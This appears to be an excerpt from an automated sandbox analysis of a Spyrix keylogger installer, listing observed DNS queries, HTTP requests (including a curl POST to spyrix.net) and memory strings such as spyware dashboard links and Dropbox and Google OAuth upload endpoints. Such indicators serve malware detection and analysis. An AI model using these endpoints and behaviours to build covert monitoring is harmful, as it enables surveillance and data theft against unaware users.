Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Bold-765bfff4.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: qrl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[
Source: qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[
Source: qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[
Source: qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[

Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SearchID="http://www.myspace.com/search/" equals www.myspace.com (Myspace)
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/ equals www.myspace.com (Myspace)
Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: msgID="http://www.myspace.com/my/mail" equals www.myspace.com (Myspace)

Source: global traffic	DNS traffic detected: DNS query: filedn.com
Source: global traffic	DNS traffic detected: DNS query: cdnbaynet.com
Source: global traffic	DNS traffic detected: DNS query: swtb-download.spyrix-sfk.com
Source: global traffic	DNS traffic detected: DNS query: dashboard.spyrix.com
Source: global traffic	DNS traffic detected: DNS query: cdn.cdndownload.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: spyrix.net

Source: unknown

HTTP traffic detected: POST /dashboard/prg-actions HTTP/1.1Host: spyrix.netUser-Agent: curl/7.64.0Accept: */*Content-Length: 425Content-Type: application/x-www-form-urlencoded

Source: spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://DASHBOARD.SPYRIX.COM/
Source: spkl.exe, 00000035.00000002.2971872040.000000000456C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://SPYRIX.NET/DASHBOARD/PRG-ACTIONS
Source: qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://.css
Source: qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://.jpg
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ca.crl0:
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/l3.crl0a
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000007.00000002.2932001410.000002BE17600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000007.00000003.1705313181.000002BE1747D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17537000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.com
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.comd
Source: qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://https://-.://%s%s%s/%s
Source: spkl.exe, 00000035.00000003.2555270269.00000000044E1000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2933829318.0000000000929000.00000040.00000001.01000000.00000014.sdmp, spmm.exe, 00000049.00000000.2715567872.00000000005EA000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://neftali.clubdelphi.com/
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.certum.pl0.
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rc.qzone.qq.com/qzonesoso/?search
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/l3.cer0
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: spkl.exe	String found in binary or memory: http://spyrix.com/manual.php
Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://user.qzone.qq.com
Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/search
Source: spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/searchecp
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.actualkeylogger.com/buynow.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html#registrate
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.html#registratehttp://www.spyrix.com/manual.php#registrateU
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: [space]= .exe, 00000012.00000003.2049227259.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2583732673.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.dk-soft.org/
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: spkl.exe, spkl.exe, 00000035.00000002.2971872040.0000000004541000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2923493069.0000000000863000.00000040.00000001.01000000.00000014.sdmp, spmm.exe, 00000049.00000002.2927093820.0000000002401000.00000004.00001000.00020000.00000000.sdmp, spmm.exe, 00000049.00000000.2712353086.0000000000401000.00000020.00000001.01000000.00000018.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: spkl.exe	String found in binary or memory: http://www.indyproject.org/Original
Source: [space]= .exe, 00000012.00000003.2050312910.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2049890416.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000000.2051232683.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jrsoftware.org/0
Source: [space]= .exe, 00000012.00000000.2048720751.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/my/mail
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ok.ru/dk?st.cmd=searchResult
Source: [space]= .exe, 00000012.00000003.2050312910.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2049890416.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000000.2051232683.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com
Source: [space]= .exe, 00000012.00000003.2049227259.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2583732673.000000000226E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.0000000003240000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2564952480.00000000033F2000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/
Source: spkl.exe	String found in binary or memory: http://www.spyrix.com/manual.php#registrate
Source: spkl.exe, 00000035.00000003.2555270269.0000000004591000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2933829318.00000000009EA000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.spyrix.com/osticket/upload/open.php
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/pro_upgrade.htm?lic=
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/purchase.php
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/purchase.php?prg=sfksT
Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.0000000003325000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/terms-of-use.php)
Source: spkl.exe, 00000035.00000002.2933829318.0000000000915000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2555270269.00000000044CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.net/ibann
Source: spmm.exe, 00000049.00000002.2933603413.0000000061E9E000.00000008.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: [space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/commit_chunked_upload
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/dropbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/sandbox
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta?
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy
